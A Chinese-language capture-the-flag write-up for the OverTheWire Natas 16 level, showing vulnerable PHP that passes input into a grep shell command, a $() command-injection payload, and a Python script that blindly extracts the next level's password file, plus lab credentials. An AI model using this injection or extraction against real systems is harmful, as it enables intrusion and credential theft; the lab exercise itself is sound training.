Overthewire level 16 to level 17

点进页面，让我们输入一个单词，查看源码得知这是从一个文件中grep查看匹配的内容，代码如下

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}

并且这个命令还做了一定程度的过滤，但是这个过滤漏了$，因此我们可以直接在里面调用系统命令。
先尝试一个简单的命令

$(echo doom)

发现网页中给了回显

Output:
doom
doom's
doomed
dooming
dooms

随便选一个，比如dooming，现在我们知道单词"dooming"没有更长的后缀了，因此我们如果拼接任意一个字符，再去字典中查询都不会有回显。基于这个原理，可以逐步爆破出natas17的密码。代码如下

import requests

target = 'http://natas16.natas.labs.overthewire.org/'

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'

filtered = ''
passwd = ''

for char in chars:
    resp = requests.get(
        url=target + "?submit=Search&needle=" + f'dooming$(grep {char} /etc/natas_webpass/natas17)',
        auth=('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'))
    if 'dooming' not in resp.text:
        filtered += char
        print(filtered)

for _ in range(32):
    for char in filtered:
        resp = requests.get(
            url=target + "?submit=Search&needle=" + f'dooming$(grep ^{passwd + char} /etc/natas_webpass/natas17)',
            auth=('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'))
        print(resp.text)
        if 'dooming' not in resp.text:
            passwd += char
            print(passwd)
            break

从本质上说这也是一个注入类的漏洞，由于代码的直接拼接让我们有了直接执行系统命令的机会。
代码执行结果如下

b
bc
bcd
bcdg
bcdgh
bcdghk
bcdghkm
bcdghkmn
bcdghkmnq
bcdghkmnqr
bcdghkmnqrs
bcdghkmnqrsw
bcdghkmnqrswA
bcdghkmnqrswAG
bcdghkmnqrswAGH
bcdghkmnqrswAGHN
bcdghkmnqrswAGHNP
bcdghkmnqrswAGHNPQ
bcdghkmnqrswAGHNPQS
bcdghkmnqrswAGHNPQSW
bcdghkmnqrswAGHNPQSW3
bcdghkmnqrswAGHNPQSW35
bcdghkmnqrswAGHNPQSW357
bcdghkmnqrswAGHNPQSW3578
bcdghkmnqrswAGHNPQSW35789
bcdghkmnqrswAGHNPQSW357890
8
8P
8Ps
8Ps3
8Ps3H
8Ps3H0
8Ps3H0G
8Ps3H0GW
8Ps3H0GWb
8Ps3H0GWbn
8Ps3H0GWbn5
8Ps3H0GWbn5r
8Ps3H0GWbn5rd
8Ps3H0GWbn5rd9
8Ps3H0GWbn5rd9S
8Ps3H0GWbn5rd9S7
8Ps3H0GWbn5rd9S7G
8Ps3H0GWbn5rd9S7Gm
8Ps3H0GWbn5rd9S7GmA
8Ps3H0GWbn5rd9S7GmAd
8Ps3H0GWbn5rd9S7GmAdg
8Ps3H0GWbn5rd9S7GmAdgQ
8Ps3H0GWbn5rd9S7GmAdgQN
8Ps3H0GWbn5rd9S7GmAdgQNd
8Ps3H0GWbn5rd9S7GmAdgQNdk
8Ps3H0GWbn5rd9S7GmAdgQNdkh
8Ps3H0GWbn5rd9S7GmAdgQNdkhP
8Ps3H0GWbn5rd9S7GmAdgQNdkhPk
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9c
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

Process finished with exit code 0

natas17关的密码为8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw